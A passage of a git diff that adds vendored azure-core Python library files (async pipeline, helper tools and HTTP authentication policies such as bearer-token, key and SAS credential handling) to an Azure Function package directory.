be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc + +from typing import Any, Union, List, Generic, TypeVar, Dict + +from azure.core.pipeline import PipelineRequest, PipelineResponse, PipelineContext +from azure.core.pipeline.policies import AsyncHTTPPolicy, SansIOHTTPPolicy +from ._tools_async import await_result as _await_result + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") +ImplPoliciesType = List[ + AsyncHTTPPolicy[ # pylint: disable=unsubscriptable-object + HTTPRequestType, AsyncHTTPResponseType + ] +] +AsyncPoliciesType = List[Union[AsyncHTTPPolicy, SansIOHTTPPolicy]] + +try: + from contextlib import AbstractAsyncContextManager +except ImportError: # Python <= 3.7 + + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +class _SansIOAsyncHTTPPolicyRunner( + AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType] +): # pylint: disable=unsubscriptable-object + """Async implementation of the SansIO policy. 
+ + Modifies the request and sends to the next policy in the chain. + + :param policy: A SansIO policy. + :type policy: ~azure.core.pipeline.policies.SansIOHTTPPolicy + """ + + def __init__(self, policy: SansIOHTTPPolicy) -> None: + super(_SansIOAsyncHTTPPolicyRunner, self).__init__() + self._policy = policy + + async def send(self, request: PipelineRequest) -> PipelineResponse: + """Modifies the request and sends to the next policy in the chain. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + await _await_result(self._policy.on_request, request) + try: + response = await self.next.send(request) # type: ignore + except Exception: # pylint: disable=broad-except + if not await _await_result(self._policy.on_exception, request): + raise + else: + await _await_result(self._policy.on_response, request, response) + return response + + +class _AsyncTransportRunner( + AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType] +): # pylint: disable=unsubscriptable-object + """Async Transport runner. + + Uses specified HTTP transport type to send request and returns response. + + :param sender: The async Http Transport instance. + """ + + def __init__(self, sender) -> None: + super(_AsyncTransportRunner, self).__init__() + self._sender = sender + + async def send(self, request): + """Async HTTP transport send method. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + return PipelineResponse( + request.http_request, + await self._sender.send(request.http_request, **request.context.options), + request.context, + ) + + +class AsyncPipeline( + AbstractAsyncContextManager, Generic[HTTPRequestType, AsyncHTTPResponseType] +): + """Async pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. + + :param transport: The async Http Transport instance. + :param list policies: List of configured policies. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START build_async_pipeline] + :end-before: [END build_async_pipeline] + :language: python + :dedent: 4 + :caption: Builds the async pipeline for asynchronous transport. + """ + + def __init__(self, transport, policies: AsyncPoliciesType = None) -> None: + self._impl_policies = [] # type: ImplPoliciesType + self._transport = transport + + for policy in policies or []: + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOAsyncHTTPPolicyRunner(policy)) + elif policy: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies) - 1): + self._impl_policies[index].next = self._impl_policies[index + 1] + if self._impl_policies: + self._impl_policies[-1].next = _AsyncTransportRunner(self._transport) + + async def __aenter__(self) -> "AsyncPipeline": + await self._transport.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self._transport.__aexit__(*exc_details) + + async def _prepare_multipart_mixed_request(self, request: HTTPRequestType) -> None: + """Will execute the multipart policies. + + Does nothing if "set_multipart_mixed" was never called. 
+        """
+        multipart_mixed_info = request.multipart_mixed_info  # type: ignore
+        if not multipart_mixed_info:
+            return
+
+        requests = multipart_mixed_info[0]  # type: List[HTTPRequestType]
+        policies = multipart_mixed_info[1]  # type: List[SansIOHTTPPolicy]
+        pipeline_options = multipart_mixed_info[3]  # type: Dict[str, Any]
+
+        async def prepare_requests(req):
+            if req.multipart_mixed_info:
+                # Recursively update changeset "sub requests"
+                await self._prepare_multipart_mixed_request(req)
+            context = PipelineContext(None, **pipeline_options)
+            pipeline_request = PipelineRequest(req, context)
+            for policy in policies:
+                await _await_result(policy.on_request, pipeline_request)
+
+        # Not happy to make this code asyncio specific, but that's multipart only for now
+        # If we need trio and multipart, let's reinvestigate that later
+        import asyncio
+
+        await asyncio.gather(*[prepare_requests(req) for req in requests])
+
+    async def _prepare_multipart(self, request: HTTPRequestType) -> None:
+        # This code is fine as long as HTTPRequestType is actually
+        # azure.core.pipeline.transport.HTTPRequest, but we don't check it here
+        # since we haven't seen (yet) any pipeline usage where it isn't that
+        # actual class
+        await self._prepare_multipart_mixed_request(request)
+        request.prepare_multipart_body()  # type: ignore
+
+    async def run(self, request: HTTPRequestType, **kwargs: Any):
+        """Runs the HTTP request through the chained policies.
+
+        :param request: The HTTP request object.
+        :type request: ~azure.core.pipeline.transport.HttpRequest
+        :return: The PipelineResponse object.
+        :rtype: ~azure.core.pipeline.PipelineResponse
+        """
+        await self._prepare_multipart(request)
+        context = PipelineContext(self._transport, **kwargs)
+        pipeline_request = PipelineRequest(request, context)
+        first_node = (
+            self._impl_policies[0]
+            if self._impl_policies
+            else _AsyncTransportRunner(self._transport)
+        )
+        return await first_node.send(pipeline_request)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools.py
new file mode 100644
index 0000000..c881914
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools.py
@@ -0,0 +1,63 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import TYPE_CHECKING + +if TYPE_CHECKING: + from typing import Any + from azure.core.rest import HttpResponse as RestHttpResponse + +def await_result(func, *args, **kwargs): + """If func returns an awaitable, raise that this runner can't handle it.""" + result = func(*args, **kwargs) + if hasattr(result, "__await__"): + raise TypeError( + "Policy {} returned awaitable object in non-async pipeline.".format(func) + ) + return result + +def is_rest(obj): + # type: (Any) -> bool + """Return whether a request or a response is a rest request / response. + + Checking whether the response has the object content can sometimes result + in a ResponseNotRead error if you're checking the value on a response + that has not been read in yet. To get around this, we also have added + a check for is_stream_consumed, which is an exclusive property on our new responses. + """ + return hasattr(obj, "is_stream_consumed") or hasattr(obj, "content") + +def handle_non_stream_rest_response(response): + # type: (RestHttpResponse) -> None + """Handle reading and closing of non stream rest responses. + For our new rest responses, we have to call .read() and .close() for our non-stream + responses. This way, we load in the body for users to access. + """ + try: + response.read() + response.close() + except Exception as exc: + response.close() + raise exc diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools_async.py new file mode 100644 index 0000000..a235243 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_tools_async.py @@ -0,0 +1,49 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- +from typing import TYPE_CHECKING +if TYPE_CHECKING: + from ..rest import AsyncHttpResponse as RestAsyncHttpResponse + + +async def await_result(func, *args, **kwargs): + """If func returns an awaitable, await it.""" + result = func(*args, **kwargs) + if hasattr(result, "__await__"): + # type ignore on await: https://github.com/python/mypy/issues/7587 + return await result # type: ignore + return result + +async def handle_no_stream_rest_response(response: "RestAsyncHttpResponse") -> None: + """Handle reading and closing of non stream rest responses. + For our new rest responses, we have to call .read() and .close() for our non-stream + responses. This way, we load in the body for users to access. + """ + try: + await response.read() + await response.close() + except Exception as exc: + await response.close() + raise exc diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__init__.py new file mode 100644 index 0000000..6a47853 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__init__.py @@ -0,0 +1,78 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- + +from ._base import HTTPPolicy, SansIOHTTPPolicy, RequestHistory +from ._authentication import BearerTokenCredentialPolicy, AzureKeyCredentialPolicy, AzureSasCredentialPolicy +from ._custom_hook import CustomHookPolicy +from ._redirect import RedirectPolicy +from ._retry import RetryPolicy, RetryMode +from ._distributed_tracing import DistributedTracingPolicy +from ._universal import ( + HeadersPolicy, + UserAgentPolicy, + NetworkTraceLoggingPolicy, + ContentDecodePolicy, + ProxyPolicy, + HttpLoggingPolicy, + RequestIdPolicy, +) + +__all__ = [ + 'HTTPPolicy', + 'SansIOHTTPPolicy', + 'BearerTokenCredentialPolicy', + 'AzureKeyCredentialPolicy', + 'AzureSasCredentialPolicy', + 'HeadersPolicy', + 'UserAgentPolicy', + 'NetworkTraceLoggingPolicy', + 'ContentDecodePolicy', + 'RetryMode', + 'RetryPolicy', + 'RedirectPolicy', + 'ProxyPolicy', + 'CustomHookPolicy', + 'DistributedTracingPolicy', + 'RequestHistory', + 'HttpLoggingPolicy', + 'RequestIdPolicy', +] + +#pylint: disable=unused-import + +try: + from ._base_async import AsyncHTTPPolicy + from ._authentication_async import AsyncBearerTokenCredentialPolicy + from ._redirect_async import AsyncRedirectPolicy + from ._retry_async import AsyncRetryPolicy + __all__.extend([ + 'AsyncHTTPPolicy', + 'AsyncBearerTokenCredentialPolicy', + 'AsyncRedirectPolicy', + 'AsyncRetryPolicy' + ]) +except (ImportError, SyntaxError): + pass # Async not supported diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b0b8749 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc new file mode 100644 index 0000000..cfed4e5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc new file mode 100644 index 0000000..2efa6b6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..8c15ca1 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc new file mode 100644 index 0000000..d2d9c17 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc new file mode 100644 index 0000000..8d07bef Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc new file mode 100644 index 0000000..717d017 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc new file mode 100644 index 0000000..e44c2eb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc new file mode 100644 index 0000000..853b11d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc new file mode 100644 index 0000000..f5d0ff8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc new file mode 100644 index 0000000..2581086 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc new file mode 100644 index 0000000..9ebe714 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc new file mode 100644 index 0000000..9c77ccf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication.py new file mode 100644 index 0000000..d3833bd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication.py @@ -0,0 +1,225 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import time +import six + +from . import HTTPPolicy, SansIOHTTPPolicy +from ...exceptions import ServiceRequestError + +try: + from typing import TYPE_CHECKING # pylint:disable=unused-import +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + # pylint:disable=unused-import + from typing import Any, Dict, Optional + from azure.core.credentials import AccessToken, TokenCredential, AzureKeyCredential, AzureSasCredential + from azure.core.pipeline import PipelineRequest, PipelineResponse + + +# pylint:disable=too-few-public-methods +class _BearerTokenCredentialPolicyBase(object): + """Base class for a Bearer Token Credential Policy. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. 
+ """ + + def __init__(self, credential, *scopes, **kwargs): # pylint:disable=unused-argument + # type: (TokenCredential, *str, **Any) -> None + super(_BearerTokenCredentialPolicyBase, self).__init__() + self._scopes = scopes + self._credential = credential + self._token = None # type: Optional[AccessToken] + + @staticmethod + def _enforce_https(request): + # type: (PipelineRequest) -> None + + # move 'enforce_https' from options to context so it persists + # across retries but isn't passed to a transport implementation + option = request.context.options.pop("enforce_https", None) + + # True is the default setting; we needn't preserve an explicit opt in to the default behavior + if option is False: + request.context["enforce_https"] = option + + enforce_https = request.context.get("enforce_https", True) + if enforce_https and not request.http_request.url.lower().startswith("https"): + raise ServiceRequestError( + "Bearer token authentication is not permitted for non-TLS protected (non-https) URLs." + ) + + @staticmethod + def _update_headers(headers, token): + # type: (Dict[str, str], str) -> None + """Updates the Authorization header with the bearer token. + + :param dict headers: The HTTP Request headers + :param str token: The OAuth token. + """ + headers["Authorization"] = "Bearer {}".format(token) + + @property + def _need_new_token(self): + # type: () -> bool + return not self._token or self._token.expires_on - time.time() < 300 + + +class BearerTokenCredentialPolicy(_BearerTokenCredentialPolicyBase, HTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.TokenCredential + :param str scopes: Lets you specify the type of access needed. + :raises: :class:`~azure.core.exceptions.ServiceRequestError` + """ + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Called before the policy sends a request. + + The base implementation authorizes the request with a bearer token. + + :param ~azure.core.pipeline.PipelineRequest request: the request + """ + self._enforce_https(request) + + if self._token is None or self._need_new_token: + self._token = self._credential.get_token(*self._scopes) + self._update_headers(request.http_request.headers, self._token.token) + + def authorize_request(self, request, *scopes, **kwargs): + # type: (PipelineRequest, *str, **Any) -> None + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. 
+ + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + self._token = self._credential.get_token(*scopes, **kwargs) + self._update_headers(request.http_request.headers, self._token.token) + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + self.on_request(request) + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = self.on_challenge(request, response) + if request_authorized: + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + + return response + + def on_challenge(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> bool + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request): + # type: (PipelineRequest) -> None + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return + + +class AzureKeyCredentialPolicy(SansIOHTTPPolicy): + """Adds a key header for the provided credential. + + :param credential: The credential used to authenticate requests. + :type credential: ~azure.core.credentials.AzureKeyCredential + :param str name: The name of the key header used for the credential. + :raises: ValueError or TypeError + """ + def __init__(self, credential, name, **kwargs): # pylint: disable=unused-argument + # type: (AzureKeyCredential, str, **Any) -> None + super(AzureKeyCredentialPolicy, self).__init__() + self._credential = credential + if not name: + raise ValueError("name can not be None or empty") + if not isinstance(name, six.string_types): + raise TypeError("name must be a string.") + self._name = name + + def on_request(self, request): + request.http_request.headers[self._name] = self._credential.key + + +class AzureSasCredentialPolicy(SansIOHTTPPolicy): + """Adds a shared access signature to query for the provided credential. 
+ + :param credential: The credential used to authenticate requests. + :type credential: ~azure.core.credentials.AzureSasCredential + :raises: ValueError or TypeError + """ + def __init__(self, credential, **kwargs): # pylint: disable=unused-argument + # type: (AzureSasCredential, **Any) -> None + super(AzureSasCredentialPolicy, self).__init__() + if not credential: + raise ValueError("credential can not be None") + self._credential = credential + + def on_request(self, request): + url = request.http_request.url + query = request.http_request.query + signature = self._credential.signature + if signature.startswith("?"): + signature = signature[1:] + if query: + if signature not in url: + url = url + "&" + signature + else: + if url.endswith("?"): + url = url + signature + else: + url = url + "?" + signature + request.http_request.url = url diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication_async.py new file mode 100644 index 0000000..ba8ca42 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication_async.py @@ -0,0 +1,130 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import asyncio +import time +from typing import TYPE_CHECKING + +from azure.core.pipeline.policies import AsyncHTTPPolicy +from azure.core.pipeline.policies._authentication import _BearerTokenCredentialPolicyBase + +from .._tools_async import await_result + +if TYPE_CHECKING: + from typing import Any, Awaitable, Optional, Union + from azure.core.credentials import AccessToken + from azure.core.credentials_async import AsyncTokenCredential + from azure.core.pipeline import PipelineRequest, PipelineResponse + + +class AsyncBearerTokenCredentialPolicy(AsyncHTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential: "AsyncTokenCredential", *scopes: str, **kwargs: "Any") -> None: + # pylint:disable=unused-argument + super().__init__() + self._credential = credential + self._lock = asyncio.Lock() + self._scopes = scopes + self._token = None # type: Optional[AccessToken] + + async def on_request(self, request: "PipelineRequest") -> None: # pylint:disable=invalid-overridden-method + """Adds a bearer token Authorization header to request and sends request to next policy. + + :param request: The pipeline request object to be modified. 
+ :type request: ~azure.core.pipeline.PipelineRequest + :raises: :class:`~azure.core.exceptions.ServiceRequestError` + """ + _BearerTokenCredentialPolicyBase._enforce_https(request) # pylint:disable=protected-access + + if self._token is None or self._need_new_token(): + async with self._lock: + # double check because another coroutine may have acquired a token while we waited to acquire the lock + if self._token is None or self._need_new_token(): + self._token = await self._credential.get_token(*self._scopes) + request.http_request.headers["Authorization"] = "Bearer " + self._token.token + + async def authorize_request(self, request: "PipelineRequest", *scopes: str, **kwargs: "Any") -> None: + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. + + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + async with self._lock: + self._token = await self._credential.get_token(*scopes, **kwargs) + request.http_request.headers["Authorization"] = "Bearer " + self._token.token + + async def send(self, request: "PipelineRequest") -> "PipelineResponse": + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + await await_result(self.on_request, request) + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = await self.on_challenge(request, response) + if request_authorized: + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + + return response + + async def on_challenge(self, request: "PipelineRequest", response: "PipelineResponse") -> bool: + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request: "PipelineRequest", response: "PipelineResponse") -> "Union[None, Awaitable[None]]": + """Executed after the request comes back from the next policy. + + :param request: Request to be 